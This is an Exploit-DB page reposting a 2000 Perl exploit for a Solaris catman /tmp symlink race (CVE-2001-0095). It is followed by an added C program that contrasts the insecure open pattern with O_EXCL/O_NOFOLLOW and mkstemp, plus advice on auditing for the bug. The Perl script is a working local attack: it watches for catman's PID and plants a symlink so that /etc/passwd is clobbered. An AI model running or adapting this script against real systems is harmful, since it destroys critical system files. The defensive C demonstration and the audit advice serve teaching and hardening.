Exploit SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber

Posted by Exploiter, 18 Dec 2022
EDB-ID: 235
EDB Verified: Passed
Author: LWC
Vulnerability type: DoS
Platform: Solaris
CVE: CVE-2001-0095
Published: 2000-12-20
Code:
#!/usr/local/bin/perl -w 
#
# The problem is that catman creates files in /tmp
# insecurely. Their names are based on the PID of the
# catman process, and catman will happily clobber
# any file that is symlinked from that path.
# The idea of this script is to watch the process
# list for the catman process, get its PID and create
# a symlink in /tmp to the file to be clobbered.
# This exploit depends on system speed and process
# load. It worked on a patched Solaris 2.7 box (August
# 2000 patch cluster):
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 [email protected]
# 11/21/2000   Vapid Labs.
# http://vapid.betteros.org

$clobber = "/etc/passwd";
while(1) {
  open ps,"ps -ef | grep -v grep |grep -v PID |";
  while(<ps>) {
    @args = split " ", $_;
    if (/catman/) { 
      print "Symlinking sman_$args[1] to  $clobber\n";
      symlink($clobber,"/tmp/sman_$args[1]");
      exit(1);
    }
  }
}


# milw0rm.com [2000-12-20]
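The comment block above describes the underlying bug: a temporary file whose name is predictable (derived from the PID) and which is opened in a way that follows a pre-planted symlink. The C program below is an added example, not part of the original post or of the Exploit-DB entry and not catman's own source. It contrasts the vulnerable open pattern with two hardened forms (O_CREAT|O_EXCL|O_NOFOLLOW on a fixed path, and mkstemp(3) for an unpredictable name) and exercises all three inside a private scratch directory that it creates itself. The "victim" file and the link name sman_12345 are constructed for the demonstration only.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern, modelled on the catman behaviour described in the
 * comment above: the path is predictable and the file is opened with
 * O_CREAT|O_TRUNC, so if a symlink has been planted at that path the
 * kernel follows it and truncates whatever it points to. */
int open_tmp_predictable(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened form for a fixed path: O_EXCL makes open() fail with EEXIST if
 * anything already exists there (a symlink counts, wherever it points), and
 * O_NOFOLLOW additionally refuses to traverse a symlink at the final
 * component. Together they fail closed on any pre-existing object. */
int open_tmp_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Hardened form when the name itself may vary: mkstemp(3) picks an
 * unpredictable suffix and opens with O_CREAT|O_EXCL and mode 0600. */
int open_tmp_unpredictable(char *template_path) {
    return mkstemp(template_path);
}

struct demo_result {
    int setup_ok;         /* 1 if scratch dir, victim file and symlink were created */
    int unsafe_clobbered; /* 1 if open_tmp_predictable truncated the victim via the link */
    int safe_open_fd;     /* -1 expected: the hardened open refuses the symlink */
    int safe_open_errno;  /* EEXIST expected */
    int mkstemp_ok;       /* 1 if mkstemp opened a fresh file */
};

static long file_size(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Runs the whole scenario in a private directory under /tmp; nothing outside
 * that directory is touched, and it is removed again at the end. */
struct demo_result run_demo(void) {
    struct demo_result r = {0, 0, 0, 0, 0};
    char dir[] = "/tmp/sman_demo_XXXXXX";   /* constructed scratch location */
    char victim[64], link[64], tmpl[64];
    int fd;

    if (mkdtemp(dir) == NULL)
        return r;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/sman_12345", dir);  /* PID-style name */
    snprintf(tmpl, sizeof tmpl, "%s/sman_XXXXXX", dir);

    /* Victim file with some content, and a symlink pointing at it. */
    fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0 || write(fd, "secret\n", 7) != 7 || close(fd) != 0 ||
        symlink(victim, link) != 0)
        return r;
    r.setup_ok = 1;

    /* The insecure open follows the link and empties the victim. */
    fd = open_tmp_predictable(link);
    if (fd >= 0) close(fd);
    r.unsafe_clobbered = (file_size(victim) == 0);

    /* The hardened open refuses the planted link. */
    errno = 0;
    r.safe_open_fd = open_tmp_exclusive(link);
    r.safe_open_errno = errno;
    if (r.safe_open_fd >= 0) close(r.safe_open_fd);

    /* mkstemp chooses a name that could not have been pre-planted. */
    fd = open_tmp_unpredictable(tmpl);
    r.mkstemp_ok = (fd >= 0);
    if (fd >= 0) { close(fd); unlink(tmpl); }

    unlink(link);
    unlink(victim);
    rmdir(dir);
    return r;
}

int main(void) {
    struct demo_result r = run_demo();
    printf("setup_ok=%d unsafe_clobbered=%d safe_open_fd=%d errno=%s mkstemp_ok=%d\n",
           r.setup_ok, r.unsafe_clobbered, r.safe_open_fd,
           r.safe_open_errno == EEXIST ? "EEXIST" : "other", r.mkstemp_ok);
    return 0;
}
```

The race the Perl script relies on exists only because the open call is willing to operate on an object that was already there. O_EXCL removes that willingness outright, and O_NOFOLLOW guards against a symlink even in code paths that legitimately reuse an existing name; mkstemp(3) removes the predictability that lets an attacker know which name to plant. Auditing setuid or root-run tools for open(2)/fopen(3) calls on /tmp paths without these flags is the practical detection step for this class of bug.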
 
Source: www.exploit-db.com